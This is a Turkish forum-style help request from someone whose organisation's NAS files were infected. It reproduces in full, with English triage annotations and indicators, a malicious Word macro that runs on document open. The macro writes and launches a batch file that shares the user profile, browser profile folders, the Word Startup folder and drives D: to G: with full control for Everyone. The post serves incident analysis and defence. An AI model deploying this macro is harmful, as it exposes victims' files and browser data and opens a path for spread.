Kurumumda NAS server'da bulunan içeriklerimize bir tür virüs bulaştı.
İçeriğinde bulunan WORD, EXCEL, POWERPOINT dosyalarının uzantıları .docm, xmlm ve pptm oldu.
Açtığımızda ise içeriği etkinleştir diyerek dosya açılıyor.
Dosya içerisinde kod düzenine baktığımda şöyle bir şeyle karşılaştım.
' ANALYST NOTES (malicious macro sample, annotated for triage; code left byte-identical).
' Document_Open is Word's auto-run event handler: it fires when the document is opened
' and macros are allowed to run ("Enable Content").
' What the visible code does:
'   1. Writes a batch file to C:\WINDOWS\RUN_AS.BAT.
'   2. The batch file creates network shares (NET SHARE) for the user profile, browser
'      profile folders, the Word Startup folder and drives D: to G:, then edits the
'      ACLs (CACLS) so that EVERYONE has Full control on each of them.
'   3. Runs the batch file through cmd, then writes a marker file C:\REPORT.TXT.
' Artifacts to search for on hosts, all taken from this listing:
'   files  : C:\WINDOWS\RUN_AS.BAT, C:\REPORT.TXT, %PUBLIC%\REPORT.TXT
'   shares : USRPRFL, CHRM_CCH, FRFX_CCH, MS_STRTP, DSK_D, DSK_E, DSK_F, DSK_G
'   string : "BY YORGOS VASILIS"
Private Sub Document_Open()
Dim strUserName As String
'Use the Application Object to get the Username
' NOTE(review): in Word, Application.UserName is the Office user name from the
' application settings, not necessarily the Windows logon account, so the check
' below does not reliably detect an administrator session.
strUserName = Application.UserName
' A user name of exactly "Administrator" skips the batch file and jumps to the marker-file step.
If strUserName = "Administrator" Then GoTo lineCls
' NOTE(review): "Not" is applied to a String here; for a non-numeric name this
' presumably raises a type-mismatch error. Confirm in a sandbox. The jump target is
' the very next label, so the line adds nothing to the control flow either way.
If Not strUserName Then GoTo lineRn
lineRn:
' "filesize" is actually a file handle number (see FreeFile below), not a size.
Dim filesize As Integer
Dim FlName As String
' Drop location of the batch file. NOTE(review): writing under C:\WINDOWS normally
' needs elevated rights, so this step may fail for standard users; verify per host.
FlName = "C:\WINDOWS\RUN_AS.BAT"
'~~> get a free file handle
filesize = FreeFile()
'~~> Open your file
' "For Output" creates the file or overwrites an existing one.
Open FlName For Output As #filesize
'~~> Export Text
' Each group below writes three batch lines: create a share, revoke EVERYONE's
' existing ACL entries (/E /R), then grant EVERYONE Full control (/E /G ...:F).
' --- user profile folder ---
Print #filesize, "NET SHARE USRPRFL=%USERPROFILE%"
Print #filesize, "CACLS %USERPROFILE% /E /R EVERYONE"
Print #filesize, "CACLS %USERPROFILE% /E /G EVERYONE:F"
Print #filesize, ""
' --- Chrome default profile folder (browser data exposed over the network) ---
' NOTE(review): this path and the Word Startup path contain spaces and are not
' quoted, so these commands may not apply as written. Check the real share and
' ACL state on affected machines instead of assuming either outcome.
Print #filesize, "NET SHARE CHRM_CCH=%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default"
Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default /E /R EVERYONE"
Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default /E /G EVERYONE:F"
Print #filesize, ""
' --- Firefox profiles folder under AppData\Local ---
Print #filesize, "NET SHARE FRFX_CCH=%USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles"
Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles /E /R EVERYONE"
Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles /E /G EVERYONE:F"
Print #filesize, ""
' --- Word Startup folder ---
' NOTE(review): Word loads templates and add-ins from its Startup folder, so a
' world-writable share here looks like the persistence/propagation path. Inspect
' this folder on every affected machine for unexpected files.
Print #filesize, "NET SHARE MS_STRTP=%USERPROFILE%\Application Data\Microsoft\Word\Startup"
Print #filesize, "CACLS %USERPROFILE%\Application Data\Microsoft\Word\Startup /E /R EVERYONE"
Print #filesize, "CACLS %USERPROFILE%\Application Data\Microsoft\Word\Startup /E /G EVERYONE:F"
Print #filesize, ""
' --- whole drives D: to G: (any data volume or mapped drive on these letters) ---
Print #filesize, "NET SHARE DSK_D=D:\"
Print #filesize, "CACLS D:\ /E /R EVERYONE"
Print #filesize, "CACLS D:\ /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE DSK_E=E:\"
Print #filesize, "CACLS E:\ /E /R EVERYONE"
Print #filesize, "CACLS E:\ /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE DSK_F=F:\"
Print #filesize, "CACLS F:\ /E /R EVERYONE"
Print #filesize, "CACLS F:\ /E /G EVERYONE:F"
Print #filesize, ""
Print #filesize, "NET SHARE DSK_G=G:\"
Print #filesize, "CACLS G:\ /E /R EVERYONE"
Print #filesize, "CACLS G:\ /E /G EVERYONE:F"
Print #filesize, ""
' --- marker/report file written by the batch file into %PUBLIC% ---
' The lines below are ECHO statements, so "IPCONFIG" and "NET USER ..." are written
' as literal text; those commands are not executed by this block.
Print #filesize, "> %PUBLIC%\REPORT.TXT ("
Print #filesize, "ECHO WORK SUCCESFULLY "
Print #filesize, "ECHO ---"
Print #filesize, "ECHO %DATE%"
Print #filesize, "ECHO %TIME%"
Print #filesize, "ECHO IPCONFIG"
Print #filesize, "ECHO NET USER %USERNAME%"
Print #filesize, "ECHO %USERPROFILE%"
Print #filesize, "ECHO ---"
' Author signature string; useful as a content-search indicator.
Print #filesize, "ECHO BY YORGOS VASILIS"
Print #filesize, ")"
Print #filesize, "EXIT"
Close #filesize
' Executes the dropped batch file. A cmd.exe child process of the Office application
' is a strong detection signal in process-creation logs.
Shell "cmd /c C:\WINDOWS\RUN_AS.BAT"
' There is no Exit Sub before this label, so the code below runs on both paths:
' after the batch file is launched and when the "Administrator" check jumped here.
lineCls:
Dim filesize2 As Integer
Dim FlName2 As String
' Second marker file, written by the macro itself at the root of C:.
FlName2 = "C:\REPORT.TXT"
'~~> get a free file handle
filesize2 = FreeFile()
'~~> Open your file
Open FlName2 For Output As #filesize2
'~~> Export Text
Print #filesize2, "The command applied succesfully"
Close #filesize2
End Sub
Bu YORGOS VASILIS kimse iyi sayıyorum şu an.
Daha önce karşılaşan var mı?
Sizce nasıl engelleriz?